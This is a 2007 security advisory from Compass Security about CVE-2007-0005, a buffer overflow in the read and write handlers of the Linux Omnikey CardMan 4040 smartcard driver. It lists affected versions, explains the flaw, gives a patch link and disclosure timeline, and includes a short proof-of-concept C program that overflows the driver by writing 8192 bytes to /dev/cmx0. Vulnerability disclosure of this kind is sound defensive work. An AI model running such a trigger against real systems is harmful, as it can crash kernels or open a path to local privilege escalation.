Buffer Overflow in Linux Drivers for Omnikey CardMan 4040 (CVE-2007-0005)



#############################################################
#
# COMPASS SECURITY ADVISORY http://www.csnc.ch/
#
#############################################################
#
# Product: Linux Driver for Omnikey CardMan 4040
# Vendor: Omnikey GmbH / Harald Welte
# Subject: Buffer Overflow
# Risk: Medium
# Effect: Locally exploitable
# Author: Daniel Roethlisberger (daniel.roethlisberger@xxxxxxx)
# Date: 2007-03-07
# CVE Name: CVE-2007-0005
#
#############################################################


Introduction:
-------------
The Linux drivers for the Omnikey CardMan 4040 smartcard reader contain
a buffer overflow vulnerability. Local attackers with direct or
indirect write permissions to a cmx device file can execute arbitrary
code with kernel privileges or may cause denial of service.


Vulnerable:
-----------
* Linux 2.4/2.6 cm4040 drivers by Omnikey:
- cm4040 v1.1.0
- cm4040 v1.2.0
- cm4040 v2.0.0
* Linux 2.6 cm4040 drivers by Harald Welte, as included in:
- Linux 2.6.15 ... 2.6.20.1

Not vulnerable:
---------------
* Linux 2.4/2.6 cm4040 drivers by Omnikey:
- cm4040 v1.0.0
* FreeBSD cmx driver by Daniel Roethlisberger

Not tested:
-----------
* Other Linux driver versions
* Drivers for MacOS X, Windows


Technical Description:
----------------------
While using the Linux drivers for the CM4040 as a reference for writing
a cmx FreeBSD driver, Compass Security has discovered two buffer
overflows in the Linux drivers. One of them in the write() and another
one in the read() handler.

When calling write() with a buffer larger than 512 bytes, the driver's
write buffer overflows, allowing to overwrite the EIP and execute
arbitrary code with kernel privileges.

In the read() handler, there is a similar problem with data originating
in the device. A malicious or buggy device sending more than 512 bytes
can overflow the driver's read buffer to the same effect.

Of course, the write() vulnerability is only exploitable by users with
direct or indirect write access to the cmx device special file. By
default, direct access is limited to root. Therefore, one might think
this is not an issue. However, unprivileged users may cause large
indirect writes via userland daemons such as those provided by pcsc-lite
or openct. Since "normal" APDUs are smaller than 512 bytes, this may
not be an issue, but I haven't looked into the various ways to cause
data to be written indirectly.

Furthermore, a system can be set up to allow access to the device for a
special user or group in order to increase security by running the
userland drivers without root privileges. In such a setup users with
access to the device can escalate privileges or cause DoS.


PoC Code:
---------
/*
* Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
* Copyright (C) Daniel Roethlisberger <daniel.roethlisberger@xxxxxxx>
* Compass Security Network Computing AG, Rapperswil, Switzerland.
* All rights reserved.
* http://www.csnc.ch/
*/

#include<sys/stat.h>
#include<fcntl.h>
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<errno.h>

int main(int argc, char *argv[]) {
int fd, i, n;
char buf[8192];

/*
* 0 1 2 3 4 5 6 7 8 9 a b c d e f ...
* 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
*/
for (i = 0; i < sizeof(buf); i += 2) {
buf[i] = (char)(((i/2) & 0xFF00) >> 8);
buf[i+1] = (char) ((i/2) & 0x00FF);
}

if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
printf("Error: open() => %s\n", strerror(errno));
exit(errno);
}
if ((n = write(fd, buf, sizeof(buf))) < 0) {
printf("Error: write() => %s\n", strerror(errno));
exit(errno);
}
printf("%d of %d bytes written\n", n, sizeof(buf));
exit(0);
}


Workaround:
-----------
Patch available: http://lkml.org/lkml/2007/3/6/386


Timeline:
---------
Vendor Status: Linux 2.6.21-rc3 contains the patch.
Omnikey will fix it in their next driver release.
Vendor Notified: 2007-02-05 (Harald Welte)
2007-02-06 (vendor-sec, Omnikey)
Vendor Response: Will fix (Harald Welte, vendor-sec)
Will fix but not coordinate release schedule (Omnikey)
Embargo Until: 2007-03-06


--
Daniel Roethlisberger, Compass Security Network Computing AG
Glaernischstrasse 7, CH-8640 Rapperswil, Switzerland

Tel +41 55 214 41 77
Fax +41 55 214 41 61
daniel.roethlisberger@xxxxxxx
http://www.csnc.ch/

PGP: D927 96F6 7266 1683 06CF F984 ACEC DBB0 6929 2CBA
Security Review - Penetration Testing - Computer Forensics